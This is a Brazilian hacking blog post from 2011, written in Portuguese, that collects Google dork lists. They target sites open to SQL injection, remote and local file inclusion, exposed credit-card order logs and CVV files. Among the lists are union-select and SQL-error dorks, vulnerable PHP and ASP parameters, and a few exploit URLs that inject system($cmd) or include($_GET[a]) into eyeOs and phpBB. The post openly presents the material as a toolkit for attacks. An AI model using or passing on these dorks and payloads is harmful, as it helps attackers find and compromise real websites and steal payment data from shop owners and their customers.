Google INURL - Brasil: string

Mostrando postagens com marcador string. Mostrar todas as postagens

sábado, 26 de fevereiro de 2011

BANCO DE STRINGS

Banco de Strings SQL ERROS
Conjunto de Strings Que expõe erros SQL em determinados sites.
OBS:BOM PARA SQL INJECTION.

Banco de Strings Busca MÚSICAS
Conjunto de Strings Que expõe diretórios / pastas / com arquivos de mídia.

Banco de Strings Busca PASSWORD
Conjunto de Strings Que expõe diretórios / pastas / com arquivos de senhas ou privilégios de edição.

Banco de Strings Busca CÂMERAS & WEB-CAN
Conjunto de Strings Que expõe Câmeras de vigilância & Web-Can's.

Click aqui e tenha acesso a muito mais dorks

Dorks variadas

/~gcw/cgi-bin/Count.cgi?df=callcard.dat
/cgi-bin/PDG_Cart/shopper.conf
/cgi-local/PDG_Cart/shopper.conf
/cgi-bin/PDG_Cart/order.log
/PDG_Cart/order.log
/cgi-bin/cart32.exe/cart32clientlist
/cgi-bin/Count.cgi?df=callcard.dat
/cgi/PDG_Cart/order.log
/PDG_Cart/authorizenets.txt
/cgi-bin/PDG_Cart/mc.txt
/PDG/order.txt
/cgi-bin/PDG_cart/card.txt
/PDG_Cart/shopper.conf
/php/mlog.phtml
/php/mylog.phtml
/webcart/carts
/cgi-bin/orders.txt
/WebShop/logs
/cgi-bin/AnyForm2
/cgi-bin/mc.txt
/ccbill/secure/ccbill.log
/cgi-bin/orders/mc.txt
/WebCart/orders.txt
/cgi-bin/orders/cc.txt
/cvv2.txt
/cgi-bin/orderlog.txt
/WebShop/logs
/orderb/shop.mdb
/_private/shopping_cart.mdb
/scripts/iisadmin/tools/mkilog.exe
/cool-logs/mylog.html
/cool-logs/mlog.html
/easylog/easylog.html
/HyperStat/stat_what.log
/mall_log_files/
/scripts/weblog

inurl:(0x3a,version
    inurl:(@version,0x3a,databse)
    inurl:(user,0x3a,pass)
    inurl:+union+select+ from
    inurl:+union+select+ pass
    inurl:+union+select+ SHOP
    inurl:+union+select+ admin
    inurl:index.php?id=
    inurl:trainers.php?id=
    inurl:buy.php?category=
    inurl:article.php?ID=
    inurl:play_old.php?id=
    inurl:declaration_more.php?decl_id=
    inurl:pageid=
    inurl:games.php?id=
    inurl:page.php?file=
    inurl:newsDetail.php?id=
    inurl:gallery.php?id=
    inurl:article.php?id=
    inurl:show.php?id=
    inurl:staff_id=
    inurl:newsitem.php?num=
    inurl:readnews.php?id=
    inurl:top10.php?cat=
    inurl:historialeer.php?num=
    inurl:reagir.php?num=
    inurl:Stray-Questions-View.php?num=
    inurl:forum_bds.php?num=
    inurl:game.php?id=
    inurl:view_product.php?id=
    inurl:newsone.php?id=
    inurl:sw_comment.php?id=
    inurl:news.php?id=
    inurl:avd_start.php?avd=
    inurl:event.php?id=
    inurl:product-item.php?id=
    inurl:sql.php?id=
    inurl:news_view.php?id=
    inurl:select_biblio.php?id=
    inurl:humor.php?id=
    inurl:aboutbook.php?id=
    inurl:ogl_inet.php?ogl_id=
    inurl:fiche_spectacle.php?id=
    inurl:communique_detail.php?id=
    inurl:sem.php3?id=
    inurl:kategorie.php4?id=
    inurl:news.php?id=
    inurl:index.php?id=
    inurl:faq2.php?id=
    inurl:show_an.php?id=
    inurl:preview.php?id=
    inurl:loadpsb.php?id=
    inurl:opinions.php?id=
    inurl:spr.php?id=
    inurl:pages.php?id=
    inurl:announce.php?id=
    inurl:clanek.php4?id=
    inurl:participant.php?id=
    inurl:download.php?id=
    inurl:main.php?id=
    inurl:review.php?id=
    inurl:chappies.php?id=
    inurl:read.php?id=
    inurl:prod_detail.php?id=
    inurl:viewphoto.php?id=
    inurl:article.php?id=
    inurl:person.php?id=
    inurl:productinfo.php?id=
    inurl:showimg.php?id=
    inurl:view.php?id=
    inurl:website.php?id=
    inurl:hosting_info.php?id=
    inurl:gallery.php?id=
    inurl:rub.php?idr=
    inurl:view_faq.php?id=
    inurl:artikelinfo.php?id=
    inurl:detail.php?ID=
    inurl:index.php?=
    inurl:profile_view.php?id=
    inurl:category.php?id=
    inurl:publications.php?id=
    inurl:fellows.php?id=
    inurl:downloads_info.php?id=
    inurl:prod_info.php?id=
    inurl:shop.php?do=part&id=
    inurl:productinfo.php?id=
    inurl:collectionitem.php?id=
    inurl:band_info.php?id=
    inurl:product.php?id=
    inurl:releases.php?id=
    inurl:ray.php?id=
    inurl:produit.php?id=
    inurl:pop.php?id=
    inurl:shopping.php?id=
    inurl:productdetail.php?id=
    inurl:post.php?id=
    inurl:viewshowdetail.php?id=
    inurl:clubpage.php?id=
    inurl:memberInfo.php?id=
    inurl:section.php?id=
    inurl:theme.php?id=
    inurl:page.php?id=
    inurl:shredder-categories.php?id=
    inurl:tradeCategory.php?id=
    inurl:product_ranges_view.php?ID=
    inurl:shop_category.php?id=
    inurl:transcript.php?id=
    inurl:channel_id=
    inurl:item_id=
    inurl:newsid=
    inurl:trainers.php?id=
    inurl:news-full.php?id=
    inurl:news_display.php?getid=
    inurl:index2.php?option=
    inurl:readnews.php?id=
    inurl:top10.php?cat=
    inurl:newsone.php?id=
    inurl:event.php?id=
    inurl:product-item.php?id=
    inurl:sql.php?id=
    inurl:aboutbook.php?id=
    inurl:preview.php?id=
    inurl:loadpsb.php?id=
    inurl:pages.php?id=
    inurl:material.php?id=
    inurl:clanek.php4?id=
    inurl:announce.php?id=
    inurl:chappies.php?id=
    inurl:read.php?id=
    inurl:viewapp.php?id=
    inurl:viewphoto.php?id=
    inurl:rub.php?idr=
    inurl:galeri_info.php?l=
    inurl:review.php?id=
    inurl:iniziativa.php?in=
    inurl:curriculum.php?id=
    inurl:labels.php?id=
    inurl:story.php?id=
    inurl:look.php?ID=
    inurl:newsone.php?id=
    inurl:aboutbook.php?id=
    inurl:material.php?id=
    inurl:opinions.php?id=
    inurl:announce.php?id=
    inurl:rub.php?idr=
    inurl:galeri_info.php?l=
    inurl:tekst.php?idt=
    inurl:newscat.php?id=
    inurl:newsticker_info.php?idn=
    inurl:rubrika.php?idr=
    inurl:rubp.php?idr=
    inurl:offer.php?idf=
    inurl:art.php?idm=
    inurl:title.php?id=
    inurl:recruit_details.php?id=
    inurl:index.php?cPath=

    ASP DORK
    nurl:”add.asp?bookid=”
    inurl:”add_cart.asp?num=”
    inurl:”addcart.asp?”
    inurl:”addItem.asp”
    inurl:”add-to-cart.asp?ID=”
    inurl:”addToCart.asp?idProduct=”
    inurl:”addtomylist.asp?ProdId=”
    inurl:”adminEditProductFields.asp?intProdID=”
    inurl:”advSearch_h.asp?idCategory=”
    inurl:”affiliate.asp?ID=”
    inurl:”affiliate-agreement.cfm?storeid=”
    inurl:”affiliates.asp?id=”
    inurl:”ancillary.asp?ID=”
    inurl:”archive.asp?id=”
    inurl:”article.asp?id=”
    inurl:”aspx?PageID”
    inurl:”basket.asp?id=”
    inurl:”Book.asp?bookID=”
    inurl:”book_list.asp?bookid=”
    inurl:”book_view.asp?bookid=”
    inurl:”BookDetails.asp?ID=”
    inurl:”browse.asp?catid=”
    inurl:”browse_item_details.asp”
    inurl:”Browse_Item_Details.asp?Store_Id=”
    inurl:”buy.asp?”
    inurl:”buy.asp?bookid=”
    inurl:”bycategory.asp?id=”
    inurl:”cardinfo.asp?card=”
    inurl:”cart.asp?action=”
    inurl:”cart.asp?cart_id=”
    inurl:”cart.asp?id=”
    inurl:”cart_additem.asp?id=”
    inurl:”cart_validate.asp?id=”
    inurl:”cartadd.asp?id=”
    inurl:”cat.asp?iCat=”
    inurl:”catalog.asp”
    inurl:”catalog.asp?CatalogID=”
    inurl:”catalog_item.asp?ID=”
    inurl:”catalog_main.asp?catid=”
    inurl:”category.asp”
    inurl:”category.asp?catid=”
    inurl:”category_list.asp?id=”
    inurl:”categorydisplay.asp?catid=”
    inurl:”checkout.asp?cartid=”
    inurl:”checkout.asp?UserID=”
    inurl:”checkout_confirmed.asp?order_id=”
    inurl:”checkout1.asp?cartid=”
    inurl:”comersus_listCategoriesAndProducts.asp?idCategory =”
    inurl:”comersus_optEmailToFriendForm.asp?idProduct=”
    inurl:”comersus_optReviewReadExec.asp?idProduct=”
    inurl:”comersus_viewItem.asp?idProduct=”
    inurl:”comments_form.asp?ID=”
    inurl:”contact.asp?cartId=”
    inurl:”content.asp?id=”
    inurl:”customerService.asp?TextID1=”
    inurl:”default.asp?catID=”
    inurl:”description.asp?bookid=”
    inurl:”details.asp?BookID=”
    inurl:”details.asp?Press_Release_ID=”
    inurl:”details.asp?Product_ID=”
    inurl:”details.asp?Service_ID=”
    inurl:”display_item.asp?id=”
    inurl:”displayproducts.asp”
    inurl:”downloadTrial.asp?intProdID=”
    inurl:”emailproduct.asp?itemid=”
    inurl:”emailToFriend.asp?idProduct=”
    inurl:”events.asp?ID=”
    inurl:”faq.asp?cartID=”
    inurl:”faq_list.asp?id=”
    inurl:”faqs.asp?id=”
    inurl:”feedback.asp?title=”
    inurl:”freedownload.asp?bookid=”
    inurl:”fullDisplay.asp?item=”
    inurl:”getbook.asp?bookid=”
    inurl:”GetItems.asp?itemid=”
    inurl:”giftDetail.asp?id=”
    inurl:”help.asp?CartId=”
    inurl:”home.asp?id=”
    inurl:”index.asp?cart=”
    inurl:”index.asp?cartID=”
    inurl:”index.asp?ID=”
    inurl:”info.asp?ID=”
    inurl:”item.asp?eid=”
    inurl:”item.asp?item_id=”
    inurl:”item.asp?itemid=”
    inurl:”item.asp?model=”
    inurl:”item.asp?prodtype=”
    inurl:”item.asp?shopcd=”
    inurl:”item_details.asp?catid=”
    inurl:”item_list.asp?maingroup”
    inurl:”item_show.asp?code_no=”
    inurl:”itemDesc.asp?CartId=”
    inurl:”itemdetail.asp?item=”
    inurl:”itemdetails.asp?catalogid=”
    inurl:”learnmore.asp?cartID=”
    inurl:”links.asp?catid=”
    inurl:”list.asp?bookid=”
    inurl:”List.asp?CatID=”
    inurl:”listcategoriesandproducts.asp?idCategory=”
    inurl:”modline.asp?id=”
    inurl:”myaccount.asp?catid=”
    inurl:”news.asp?id=”
    inurl:”order.asp?BookID=”
    inurl:”order.asp?id=”
    inurl:”order.asp?item_ID=”
    inurl:”OrderForm.asp?Cart=”
    inurl:”page.asp?PartID=”
    inurl:”payment.asp?CartID=”
    inurl:”pdetail.asp?item_id=”
    inurl:”powersearch.asp?CartId=”
    inurl:”privacy.asp?cartID=”
    inurl:”prodbycat.asp?intCatalogID=”
    inurl:”prodetails.asp?prodid=”
    inurl:”prodlist.asp?catid=”
    inurl:”product.asp?bookID=”
    inurl:”product.asp?intProdID=”
    inurl:”product_info.asp?item_id=”
    inurl:”productDetails.asp?idProduct=”
    inurl:”productDisplay.asp”
    inurl:”productinfo.asp?item=”
    inurl:”productlist.asp?ViewType=Category&CategoryID= “
    inurl:”productpage.asp”
    inurl:”products.asp?ID=”
    inurl:”products.asp?keyword=”
    inurl:”products_category.asp?CategoryID=”
    inurl:”products_detail.asp?CategoryID=”
    inurl:”productsByCategory.asp?intCatalogID=”
    inurl:”prodView.asp?idProduct=”
    inurl:”promo.asp?id=”
    inurl:”promotion.asp?catid=”
    inurl:”pview.asp?Item=”
    inurl:”resellers.asp?idCategory=”
    inurl:”results.asp?cat=”
    inurl:”savecart.asp?CartId=”
    inurl:”search.asp?CartID=”
    inurl:”searchcat.asp?search_id=”

    inurl:”Select_Item.asp?id=”
    inurl:”Services.asp?ID=”
    inurl:”shippinginfo.asp?CartId=”
    inurl:”shop.asp?a=”
    inurl:”shop.asp?action=”
    inurl:”shop.asp?bookid=”
    inurl:”shop.asp?cartID=”
    inurl:”shop_details.asp?prodid=”
    inurl:”shopaddtocart.asp”
    inurl:”shopaddtocart.asp?catalogid=”
    inurl:”shopbasket.asp?bookid=”
    inurl:”shopbycategory.asp?catid=”
    inurl:”shopcart.asp?title=”
    inurl:”shopcreatorder.asp”
    inurl:”shopcurrency.asp?cid=”
    inurl:”shopdc.asp?bookid=”
    inurl:”shopdisplaycategories.asp”
    inurl:”shopdisplayproduct.asp?catalogid=”
    inurl:”shopdisplayproducts.asp”
    inurl:”shopexd.asp”
    inurl:”shopexd.asp?catalogid=”
    inurl:”shopping_basket.asp?cartID=”
    inurl:”shopprojectlogin.asp”
    inurl:”shopquery.asp?catalogid=”
    inurl:”shopremoveitem.asp?cartid=”
    inurl:”shopreviewadd.asp?id=”
    inurl:”shopreviewlist.asp?id=”
    inurl:”ShopSearch.asp?CategoryID=”
    inurl:”shoptellafriend.asp?id=”
    inurl:”shopthanks.asp”
    inurl:”shopwelcome.asp?title=”
    inurl:”show_item.asp?id=”
    inurl:”show_item_details.asp?item_id=”
    inurl:”showbook.asp?bookid=”
    inurl:”showStore.asp?catID=”
    inurl:”shprodde.asp?SKU=”
    inurl:”specials.asp?id=”
    inurl:”store.asp?id=”
    inurl:”store_bycat.asp?id=”
    inurl:”store_listing.asp?id=”
    inurl:”Store_ViewProducts.asp?Cat=”
    inurl:”store-details.asp?id=”
    inurl:”storefront.asp?id=”
    inurl:”storefronts.asp?title=”
    inurl:”storeitem.asp?item=”
    inurl:”StoreRedirect.asp?ID=”
    inurl:”subcategories.asp?id=”
    inurl:”tek9.asp?”
    inurl:”template.asp?Action=Item&pid=”
    inurl:”topic.asp?ID=”
    inurl:”tuangou.asp?bookid=”
    inurl:”type.asp?iType=”
    inurl:”updatebasket.asp?bookid=”
    inurl:”updates.asp?ID=”
    inurl:”view.asp?cid=”
    inurl:”view_cart.asp?title=”
    inurl:”view_detail.asp?ID=”
    inurl:”viewcart.asp?CartId=”
    inurl:”viewCart.asp?userID=”
    inurl:”viewCat_h.asp?idCategory=”
    inurl:”viewevent.asp?EventID=”
    inurl:”viewitem.asp?recor=”
    inurl:”viewPrd.asp?idcategory=”
    inurl:”ViewProduct.asp?misc=”
    inurl:”voteList.asp?item_ID=”
    inurl:”whatsnew.asp?idCategory=”
    inurl:”WsAncillary.asp?ID=”

    SQL DORK

    inurl:”id=” & intext:”Warning: mysql_fetch_assoc()
    inurl:”id=” & intext:”Warning: mysql_fetch_array()
    inurl:”id=” & intext:”Warning: mysql_num_rows()
    inurl:”id=” & intext:”Warning: session_start()
    inurl:”id=” & intext:”Warning: getimagesize()
    inurl:”id=” & intext:”Warning: is_writable()
    inurl:”id=” & intext:”Warning: getimagesize()
    inurl:”id=” & intext:”Warning: Unknown()
    inurl:”id=” & intext:”Warning: session_start()
    inurl:”id=” & intext:”Warning: mysql_result()
    inurl:”id=” & intext:”Warning: pg_exec()
    inurl:”id=” & intext:”Warning: mysql_result()
    inurl:”id=” & intext:”Warning: mysql_num_rows()
    inurl:”id=” & intext:”Warning: mysql_query()
    inurl:”id=” & intext:”Warning: array_merge()
    inurl:”id=” & intext:”Warning: preg_match()
    inurl:”id=” & intext:”Warning: ilesize()
    inurl:”id=” & intext:”Warning: filesize()
    inurl:”id=” & intext:”Warning: filesize()
    inurl:”id=” & intext:”Warning: require()
    inurl:(0x3a,version
    inurl:(@version,0x3a,databse)
    inurl:(user,0x3a,pass)
    inurl:+union+select+ from
    inurl:+union+select+ pass
    inurl:+union+select+ SHOP
    inurl:+union+select+ admin
    inurl:index.php?id=
    inurl:trainers.php?id=
    inurl:buy.php?category=
    inurl:article.php?ID=
    inurl:play_old.php?id=
    inurl:declaration_more.php?decl_id=
    inurl:pageid=
    inurl:games.php?id=
    inurl:page.php?file=
    inurl:newsDetail.php?id=
    inurl:gallery.php?id=
    inurl:article.php?id=
    inurl:show.php?id=
    inurl:staff_id=
    inurl:newsitem.php?num=
    inurl:readnews.php?id=
    inurl:top10.php?cat=
    inurl:historialeer.php?num=
    inurl:reagir.php?num=
    inurl:Stray-Questions-View.php?num=

    RFI AND LFI

    RFI
    inurl:/modules/mod_mainmenu.php?mosConfig_absolute_path=

    inurl:/include/new-visitor.inc.php?lvc_include_dir=

    inurl:/_functions.php?prefix=

    inurl:/cpcommerce/_functions.php?prefix=

    inurl:/modules/coppermine/themes/default/theme.php?THEME_DIR=

    inurl:/modules/agendax/addevent.inc.php?agendax_path=

    inurl:/ashnews.php?pathtoashnews=

    inurl:/eblog/blog.inc.php?xoopsConfig[xoops_url]=

    inurl:/pm/lib.inc.php?pm_path=

    inurl:/b2-tools/gm-2-b2.php?b2inc=

    inurl:/modules/mod_mainmenu.php?mosConfig_absolute_path=

    inurl:/modules/agendax/addevent.inc.php?agendax_path=

    inurl:/includes/include_once.php?include_file=

    inurl:/e107/e107_handlers/secure_img_render.php?p=

    inurl:/shoutbox/expanded.php?conf=

    inurl:/main.php?x=

    inurl:/myPHPCalendar/admin.php?cal_dir=

    inurl:/index.php/main.php?x=

    inurl:/index.php?include=

    inurl:/index.php?x=

    inurl:/index.php?open=

    inurl:/index.php?visualizar=

    inurl:/template.php?pagina=

    inurl:/index.php?pagina=

    inurl:/index.php?inc=

    inurl:/includes/include_onde.php?include_file=

    inurl:/index.php?page=

    inurl:/index.php?pg=

    inurl:/index.php?show=

    inurl:/index.php?cat=

    inurl:/index.php?file=

    inurl:/db.php?path_local=

    inurl:/index.php?site=

    inurl:/htmltonuke.php?filnavn=

    inurl:/livehelp/inc/pipe.php?HCL_path=

    inurl:/hcl/inc/pipe.php?HCL_path=

    inurl:/inc/pipe.php?HCL_path=

    inurl:/support/faq/inc/pipe.php?HCL_path=

    inurl:/help/faq/inc/pipe.php?HCL_path=

    inurl:/helpcenter/inc/pipe.php?HCL_path=

    inurl:/live-support/inc/pipe.php?HCL_path=

    inurl:/gnu3/index.php?doc=

    inurl:/gnu/index.php?doc=

    inurl:/phpgwapi/setup/tables_update.inc.php?appdir=

    inurl:/forum/install.php?phpbb_root_dir=

    inurl:/includes/calendar.php?phpc_root_path=

    inurl:/includes/setup.php?phpc_root_path=

    inurl:/inc/authform.inc.php?path_pre=

    inurl:/include/authform.inc.php?path_pre=

    inurl:index.php?nic=

    inurl:index.php?sec=

    inurl:index.php?content=

    inurl:index.php?link=

    inurl:index.php?filename=

    inurl:index.php?dir=

    inurl:index.php?document=

    inurl:index.php?view=

    inurl:*.php?sel=

    inurl:*.php?session=&content=

    inurl:*.php?locate=

    inurl:*.php?place=

    inurl:*.php?layout=

    inurl:*.php?go=

    inurl:*.php?catch=

    inurl:*.php?mode=

    inurl:*.php?name=

    inurl:*.php?loc=

    inurl:*.php?f=

    inurl:*.php?inf=

    inurl:*.php?pg=

    inurl:*.php?load=

    inurl:*.php?naam=

    allinurl:/index.php?page= site:*.dk

    allinurl:/index.php?file= site:*.dk

    INURL OR ALLINURL WITH:

    /temp_eg/phpgwapi/setup/tables_update.inc.php?appdir=

    /includes/header.php?systempath=

    /Gallery/displayCategory.php?basepath=

    /index.inc.php?PATH_Includes=

    /ashnews.php?pathtoashnews=

    /ashheadlines.php?pathtoashnews=

    /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=

    /demo/includes/init.php?user_inc=

    /jaf/index.php?show=

    /inc/shows.inc.php?cutepath=

    /poll/admin/common.inc.php?base_path=

    /pollvote/pollvote.php?pollname=

    /sources/post.php?fil_config=

    /modules/My_eGallery/public/displayCategory.php?basepath=

    /bb_lib/checkdb.inc.php?libpach=

    /include/livre_include.php?no_connect=lol&chem_absolu=

    /index.php?from_market=Y&pageurl=

    /modules/mod_mainmenu.php?mosConfig_absolute_path=

    /pivot/modules/module_db.php?pivot_path=

    /modules/4nAlbum/public/displayCategory.php?basepath=

    /derniers_commentaires.php?rep=

    /modules/coppermine/themes/default/theme.php?THEME_DIR=

    /modules/coppermine/include/init.inc.php?CPG_M_DIR=

    /modules/coppermine/themes/coppercop/theme.php?THEME_DIR=

    /coppermine/themes/maze/theme.php?THEME_DIR=

    /allmylinks/include/footer.inc.php?_AMLconfig[cfg_serverpath]=

    /allmylinks/include/info.inc.php?_AMVconfig[cfg_serverpath]=

    /myPHPCalendar/admin.php?cal_dir=

    /agendax/addevent.inc.php?agendax_path=

    /modules/mod_mainmenu.php?mosConfig_absolute_path=

    /modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=

    /main.php?page=

    /default.php?page=

    /index.php?action=

    /index1.php?p=

    /index2.php?x=

    /index2.php?content=

    /index.php?conteudo=

    /index.php?cat=

    /include/new-visitor.inc.php?lvc_include_dir=

    /modules/agendax/addevent.inc.php?agendax_path=

    /shoutbox/expanded.php?conf=

    /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=

    /pivot/modules/module_db.php?pivot_path=

    /library/editor/editor.php?root=

    /library/lib.php?root=

    /e107/e107_handlers/secure_img_render.php?p=

    /zentrack/index.php?configFile=

    /main.php?x=

    /becommunity/community/index.php?pageurl=

    /GradeMap/index.php?page=

    /index4.php?body=

    /side/index.php?side=

    /main.php?page=

    /es/index.php?action=

    /index.php?sec=

    /index.php?main=

    /index.php?sec=

    /index.php?menu=

    /html/page.php?page=

    /page.php?view=

    /index.php?menu=

    /main.php?view=

    /index.php?page=

    /content.php?page=

    /main.php?page=

    /index.php?x=

    /main_site.php?page=

    /index.php?L2=

    /content.php?page=

    /main.php?page=

    /index.php?x=

    /main_site.php?page=

    /index.php?L2=

    /index.php?show=

    /tutorials/print.php?page=

    /index.php?page=

    /index.php?level=

    /index.php?file=

    /index.php?inter_url=

    /index.php?page=

    /index2.php?menu=

    /index.php?level=

    /index1.php?main=

    /index1.php?nav=

    /index1.php?link=

    /index2.php?page=

    /index.php?myContent=

    /index.php?TWC=

    /index.php?sec=

    /index1.php?main=

    /index2.php?page=

    /index.php?babInstallPath=

    /main.php?body=

    /index.php?z=

    /main.php?view=

    /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=

    /index.php?file=

    /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=

    1. allinurl:my_egallery site:.org
    /modules/My_eGallery/public/displayCategory.php?basepath=

    2. allinurl:xgallery site:.org
    /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=

    3. allinurl:coppermine site:.org
    /modules/coppermine/themes/default/theme.php?THEME_DIR=

    4. allinurl:4nAlbum site:.org
    /modules/4nAlbum/public/displayCategory.php?basepath=

    5. allinurlP:NphpBB2 site:.org
    /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=

    6. allinurl:ihm.php?p=

    7. Keyword : “powered by AllMyLinks”
    /include/footer.inc.php?_AMLconfig[cfg_serverpath]=

    8. allinurl:/modules.php?name=allmyguests
    /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=

    9. allinurl:/Popper/index.php?
    /Popper/index.php?childwindow.inc.php?form=

    10. google = kietu/hit_js.php, allinurl:kietu/hit_js.php
    yahoo = by Kietu? v 3.2
    /kietu/index.php?kietu[url_hit]=

    11. keyword : “Powered by phpBB 2.0.6?
    /html&highlight=%2527.include($_GET[a]),exit.%2527&a=

    12. keyword : “powered by CubeCart 3.0.6?
    /includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=

    13. keyword : “powered by paBugs 2.0 Beta 3?
    /class.mysql.php?path_to_bt_dir=

    14. allinurl:”powered by AshNews”, allinurl:AshNews atau allinurl: /ashnews.php
    /ashnews.php?pathtoashnews=

    15. keyword : /phorum/login.php
    /phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=

    16. allinurl:ihm.php?p=*

    14. keyword : “powered eyeOs”
    /eyeos/desktop.php?baccio=eyeOptions.eyeapp&a=eyeOptions. eyeapp&_SESSION%5busr%5d=root&_SESSION%5bapps%5d%5 beyeOptions.eyeapp%5d%5bwrapup%5d=system($cmd);&cm d=id
    diganti dengan :
    /eyeos/desktop.php?baccio=eyeOptions.eyeapp&a=eyeOptions. eyeapp&_SESSION%5busr%5d=root&_SESSION%5bapps%5d%5 beyeOptions.eyeapp%5d%5bwrapup%5d=include($_GET%5b a%5d);&a=

    15. allinurl:.php?bodyfile=

    16. allinurl:/includes/orderSuccess.inc.php?glob=
    /includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=

    17. allinurl:forums.html
    /modules.php?name=

    18. allinurl:/default.php?page=home

    19. allinurl:/folder.php?id=

    20. allinurl:main.php?pagina=
    /paginedinamiche/main.php?pagina=

    21. Key Word: ( Nuke ET Copyright 2004 por Truzone. ) or ( allinurl:*.edu.*/modules.php?name=allmyguests ) or ( “powered by AllMyGuests”)
    /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=

    22. allinurl:application.php?base_path=
    /application.php?base_path=

    23. allinurlp:hplivehelper
    /phplivehelper/initiate.php?abs_path=

    24. allinurlp:hpnuke
    /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=

    25. key word : “powered by Fantastic News v2.1.2?
    /archive.php?CONFIG[script_path]=

    26. keyword: “powered by smartblog” AND inurl:?page=login
    /index.php?page=

    27. allinurl:/forum/
    /forum/admin/index.php?inc_conf=

    28. keyword:”Powered By FusionPHP”
    /templates/headline_temp.php?nst_inc=

    29. allinurl:shoutbox/expanded.php filetypep:hp
    /shoutbox/expanded.php?conf=

    30. allinurl: /osticket/
    /osticket/include/main.php?config[search_disp]=true&include_dir=

    31. keyword : “Powered by iUser”
    /common.php?include_path=

    32. allinurl: “static.php?load=”
    /static.php?load=

    33. keyworld : /phpcoin/login.php
    /phpcoin/config.php?_CCFG[_PKG_PATH_DBSE]=

    34. keyworld: allinurl:/phpGedview/login.php site:
    /help_text_vars.php?dir&PGV_BASE_DIRECTORY=

    35. allinurl:/folder.php?id=
    /classes.php?LOCAL_PATH=
    LFI

    acion=
    act=
    action=
    API_HOME_DIR=
    board=
    cat=
    client_id=
    cmd=
    cont=
    current_frame=
    date=
    detail=
    dir=
    display=
    download=
    f=
    file=
    fileinclude=
    filename=
    firm_id=
    g=
    getdata=
    go=
    HT=
    idd=
    inc=
    incfile=
    incl=
    include_file=
    include_path=
    infile=
    info=
    ir=
    lang=
    language=
    link=
    load=
    main=
    mainspot=
    msg=
    num=
    openfile=
    p=
    page=
    pagina=
    path=
    path_to_calendar=
    pg=
    plik
    qry_str=
    ruta=
    safehtml=
    section=
    showfile=
    side=
    site_id=
    skin=
    static=
    str=
    strona=
    sub=
    tresc=
    url=
    user=


inurl:"add.asp?bookid="
inurl:"add_cart.asp?num="
inurl:"addcart.asp?"
inurl:"addItem.asp"
inurl:"add-to-cart.asp?ID="
inurl:"addToCart.asp?idProduct="
inurl:"addtomylist.asp?ProdId="
inurl:"adminEditProductFields.asp?intProdID="
inurl:"advSearch_h.asp?idCategory="
inurl:"affiliate.asp?ID="
inurl:"affiliate-agreement.cfm?storeid="
inurl:"affiliates.asp?id="
inurl:"ancillary.asp?ID="
inurl:"archive.asp?id="
inurl:"article.asp?id="
inurl:"aspx?PageID"
inurl:"basket.asp?id="
inurl:"Book.asp?bookID="
inurl:"book_list.asp?bookid="
inurl:"book_view.asp?bookid="
inurl:"BookDetails.asp?ID="
inurl:"browse.asp?catid="
inurl:"browse_item_details.asp"
inurl:"Browse_Item_Details.asp?Store_Id="
inurl:"buy.asp?"
inurl:"buy.asp?bookid="
inurl:"bycategory.asp?id="
inurl:"cardinfo.asp?card="
inurl:"cart.asp?action="
inurl:"cart.asp?cart_id="
inurl:"cart.asp?id="
inurl:"cart_additem.asp?id="
inurl:"cart_validate.asp?id="
inurl:"cartadd.asp?id="
inurl:"cat.asp?iCat="
inurl:"catalog.asp"
inurl:"catalog.asp?CatalogID="
inurl:"catalog_item.asp?ID="
inurl:"catalog_main.asp?catid="
inurl:"category.asp"
inurl:"category.asp?catid="
inurl:"category_list.asp?id="
inurl:"categorydisplay.asp?catid="
inurl:"checkout.asp?cartid="
inurl:"checkout.asp?UserID="
inurl:"checkout_confirmed.asp?order_id="
inurl:"checkout1.asp?cartid="
inurl:"comersus_listCategoriesAndProducts.asp?idCategory ="
inurl:"comersus_optEmailToFriendForm.asp?idProduct="
inurl:"comersus_optReviewReadExec.asp?idProduct="
inurl:"comersus_viewItem.asp?idProduct="
inurl:"comments_form.asp?ID="
inurl:"contact.asp?cartId="
inurl:"content.asp?id="
inurl:"customerService.asp?TextID1="
inurl:"default.asp?catID="
inurl:"description.asp?bookid="
inurl:"details.asp?BookID="
inurl:"details.asp?Press_Release_ID="
inurl:"details.asp?Product_ID="
inurl:"details.asp?Service_ID="
inurl:"display_item.asp?id="
inurl:"displayproducts.asp"
inurl:"downloadTrial.asp?intProdID="
inurl:"emailproduct.asp?itemid="
inurl:"emailToFriend.asp?idProduct="
inurl:"events.asp?ID="
inurl:"faq.asp?cartID="
inurl:"faq_list.asp?id="
inurl:"faqs.asp?id="
inurl:"feedback.asp?title="
inurl:"freedownload.asp?bookid="
inurl:"fullDisplay.asp?item="
inurl:"getbook.asp?bookid="
inurl:"GetItems.asp?itemid="
inurl:"giftDetail.asp?id="
inurl:"help.asp?CartId="
inurl:"home.asp?id="
inurl:"index.asp?cart="
inurl:"index.asp?cartID="
inurl:"index.asp?ID="
inurl:"info.asp?ID="
inurl:"item.asp?eid="
inurl:"item.asp?item_id="
inurl:"item.asp?itemid="
inurl:"item.asp?model="
inurl:"item.asp?prodtype="
inurl:"item.asp?shopcd="
inurl:"item_details.asp?catid="
inurl:"item_list.asp?maingroup"
inurl:"item_show.asp?code_no="
inurl:"itemDesc.asp?CartId="
inurl:"itemdetail.asp?item="
inurl:"itemdetails.asp?catalogid="
inurl:"learnmore.asp?cartID="
inurl:"links.asp?catid="
inurl:"list.asp?bookid="
inurl:"List.asp?CatID="
inurl:"listcategoriesandproducts.asp?idCategory="
inurl:"modline.asp?id="
inurl:"myaccount.asp?catid="
inurl:"news.asp?id="
inurl:"order.asp?BookID="
inurl:"order.asp?id="
inurl:"order.asp?item_ID="
inurl:"OrderForm.asp?Cart="
inurl:"page.asp?PartID="
inurl:"payment.asp?CartID="
inurl:"pdetail.asp?item_id="
inurl:"powersearch.asp?CartId="
inurl:"privacy.asp?cartID="
inurl:"prodbycat.asp?intCatalogID="
inurl:"prodetails.asp?prodid="
